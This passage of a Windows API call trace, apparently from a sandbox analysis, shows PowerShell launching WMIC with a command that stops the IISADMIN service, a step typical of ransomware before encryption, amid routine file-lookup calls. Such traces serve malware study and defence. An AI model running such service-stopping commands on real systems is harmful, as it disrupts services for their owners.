lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0253.452] SetErrorMode (uMode=0x1) returned 0x1 [0253.452] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.452] SetErrorMode (uMode=0x1) returned 0x1 [0253.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0253.453] SetErrorMode (uMode=0x1) returned 0x1 [0253.453] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.453] SetErrorMode (uMode=0x1) returned 0x1 [0253.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0253.453] SetErrorMode (uMode=0x1) returned 0x1 [0253.454] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1feb60 [0253.454] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c88d390 | out: lpFindFileData=0x1c88d390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0253.454] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0253.454] SetErrorMode (uMode=0x1) returned 0x1 [0253.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c88d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0253.455] SetErrorMode (uMode=0x1) returned 0x1 [0253.455] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c88d6b0 | out: lpFileInformation=0x1c88d6b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0253.455] SetErrorMode (uMode=0x1) returned 0x1 [0253.455] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0253.455] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c88d898, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c88d898) returned 0x4550 [0253.457] CoTaskMemFree (pv=0x1b9b1010) [0253.457] GetConsoleWindow () returned 0x5011e [0253.458] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0253.458] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0253.458] CoTaskMemFree (pv=0x2af8c0) [0253.459] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0253.459] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0253.459] CoTaskMemFree (pv=0x2af8c0) [0253.459] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice", pNumArgs=0x1c88d8e0 | out: pNumArgs=0x1c88d8e0) returned 0x1ee760*="" [0253.459] lstrlenW (lpString="path") returned 4 [0253.459] CoTaskMemAlloc (cb=0xc) returned 0x29ced0 [0253.459] RtlMoveMemory (in: Destination=0x29ced0, Source=0x1ee7a2, Length=0xa | out: Destination=0x29ced0) [0253.459] CoTaskMemFree (pv=0x29ced0) [0253.459] lstrlenW (lpString="Win32_Service") returned 13 [0253.459] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1010 [0253.459] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee7ac, Length=0x1c | out: Destination=0x1b9b1010) [0253.459] CoTaskMemFree (pv=0x1b9b1010) [0253.459] lstrlenW (lpString="where") returned 5 [0253.459] CoTaskMemAlloc (cb=0xe) returned 0x29ced0 [0253.459] RtlMoveMemory (in: Destination=0x29ced0, Source=0x1ee7c8, Length=0xc | out: Destination=0x29ced0) [0253.459] CoTaskMemFree (pv=0x29ced0) [0253.459] lstrlenW (lpString="name like '%%IISADMIN%%'") returned 24 [0253.459] CoTaskMemAlloc (cb=0x34) returned 0x1b9c7170 [0253.459] RtlMoveMemory (in: Destination=0x1b9c7170, Source=0x1ee7d4, Length=0x32 | out: Destination=0x1b9c7170) [0253.459] CoTaskMemFree (pv=0x1b9c7170) [0253.459] lstrlenW (lpString="call") returned 4 [0253.459] CoTaskMemAlloc (cb=0xc) returned 0x29ced0 [0253.459] RtlMoveMemory (in: Destination=0x29ced0, Source=0x1ee806, Length=0xa | out: Destination=0x29ced0) [0253.459] CoTaskMemFree (pv=0x29ced0) [0253.459] lstrlenW (lpString="stopservice") returned 11 [0253.459] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1010 [0253.460] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee810, Length=0x18 | out: Destination=0x1b9b1010) [0253.460] CoTaskMemFree (pv=0x1b9b1010) [0253.460] LocalFree (hMem=0x1ee760) returned 0x0 [0253.460] CoTaskMemAlloc (cb=0x804) returned 0x1b9e8f90 [0253.460] GetConsoleTitleW (in: lpConsoleTitle=0x1b9e8f90, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0253.460] CoTaskMemFree (pv=0x1b9e8f90) [0253.461] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0253.461] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c88d840*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x323faf0 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice", lpProcessInformation=0x323faf0*(hProcess=0x7ac, hThread=0x7a8, dwProcessId=0x4e8, dwThreadId=0xabc)) returned 1 [0253.464] CoTaskMemFree (pv=0x253f20) [0253.465] CloseHandle (hObject=0x7a8) returned 1 [0253.465] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0253.465] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c88d8e8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c88d8e8) returned 0x4550 [0253.465] CoTaskMemFree (pv=0x1b9b1010) [0253.465] GetCurrentProcess () returned 0xffffffffffffffff [0253.465] GetCurrentProcess () returned 0xffffffffffffffff [0253.466] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x7ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c88d9c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c88d9c8*=0x7a8) returned 1 [0254.667] CloseHandle (hObject=0x7a8) returned 1 [0254.667] GetExitCodeProcess (in: hProcess=0x7ac, lpExitCode=0x1c88da38 | out: lpExitCode=0x1c88da38*=0x0) returned 1 [0254.667] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0254.669] CloseHandle (hObject=0x7ac) returned 1 [0254.669] SetEvent (hEvent=0x778) returned 1 [0254.669] SetEvent (hEvent=0x76c) returned 1 [0254.669] SetEvent (hEvent=0x770) returned 1 [0254.669] SetEvent (hEvent=0x774) returned 1 [0254.669] SetEvent (hEvent=0x788) returned 1 [0254.670] SetEvent (hEvent=0x77c) returned 1 [0254.670] SetEvent (hEvent=0x780) returned 1 [0254.670] SetEvent (hEvent=0x784) returned 1 [0254.670] SetEvent (hEvent=0x78c) returned 1 [0254.670] CoUninitialize () Thread: id = 222 os_tid = 0x2dc [0254.702] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0254.704] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0254.705] VirtualQuery (in: lpAddress=0x1c86d540, lpBuffer=0x1c86e400, dwLength=0x30 | out: lpBuffer=0x1c86e400*(BaseAddress=0x1c86d000, AllocationBase=0x1bee0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0254.707] VirtualQuery (in: lpAddress=0x1c86d7f0, lpBuffer=0x1c86e6b0, dwLength=0x30 | out: lpBuffer=0x1c86e6b0*(BaseAddress=0x1c86d000, AllocationBase=0x1bee0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0254.710] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0254.710] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0254.710] CoTaskMemFree (pv=0x2af8c0) [0254.710] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0254.710] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0254.710] CoTaskMemFree (pv=0x2af8c0) [0254.711] CoTaskMemAlloc (cb=0x20e) returned 0x2bd190 [0254.711] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bd190 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0254.711] CoTaskMemFree (pv=0x2bd190) [0254.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.711] SetErrorMode (uMode=0x1) returned 0x1 [0254.712] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.712] SetErrorMode (uMode=0x1) returned 0x1 [0254.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.713] SetErrorMode (uMode=0x1) returned 0x1 [0254.713] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.713] SetErrorMode (uMode=0x1) returned 0x1 [0254.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.713] SetErrorMode (uMode=0x1) returned 0x1 [0254.714] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.714] SetErrorMode (uMode=0x1) returned 0x1 [0254.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.714] SetErrorMode (uMode=0x1) returned 0x1 [0254.714] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.715] SetErrorMode (uMode=0x1) returned 0x1 [0254.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.715] SetErrorMode (uMode=0x1) returned 0x1 [0254.715] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.715] SetErrorMode (uMode=0x1) returned 0x1 [0254.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.716] SetErrorMode (uMode=0x1) returned 0x1 [0254.716] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.716] SetErrorMode (uMode=0x1) returned 0x1 [0254.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.717] SetErrorMode (uMode=0x1) returned 0x1 [0254.717] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.717] SetErrorMode (uMode=0x1) returned 0x1 [0254.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.717] SetErrorMode (uMode=0x1) returned 0x1 [0254.717] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.718] SetErrorMode (uMode=0x1) returned 0x1 [0254.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.718] SetErrorMode (uMode=0x1) returned 0x1 [0254.718] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.718] SetErrorMode (uMode=0x1) returned 0x1 [0254.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.719] SetErrorMode (uMode=0x1) returned 0x1 [0254.719] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.719] SetErrorMode (uMode=0x1) returned 0x1 [0254.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.720] SetErrorMode (uMode=0x1) returned 0x1 [0254.720] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.720] SetErrorMode (uMode=0x1) returned 0x1 [0254.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.720] SetErrorMode (uMode=0x1) returned 0x1 [0254.721] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.721] SetErrorMode (uMode=0x1) returned 0x1 [0254.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.721] SetErrorMode (uMode=0x1) returned 0x1 [0254.721] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.722] SetErrorMode (uMode=0x1) returned 0x1 [0254.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.722] SetErrorMode (uMode=0x1) returned 0x1 [0254.722] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.722] SetErrorMode (uMode=0x1) returned 0x1 [0254.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0254.723] SetErrorMode (uMode=0x1) returned 0x1 [0254.723] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.723] SetErrorMode (uMode=0x1) returned 0x1 [0254.723] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.758] SetErrorMode (uMode=0x1) returned 0x1 [0254.758] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.758] SetErrorMode (uMode=0x1) returned 0x1 [0254.758] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.758] SetErrorMode (uMode=0x1) returned 0x1 [0254.759] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.759] SetErrorMode (uMode=0x1) returned 0x1 [0254.759] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.759] SetErrorMode (uMode=0x1) returned 0x1 [0254.760] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, 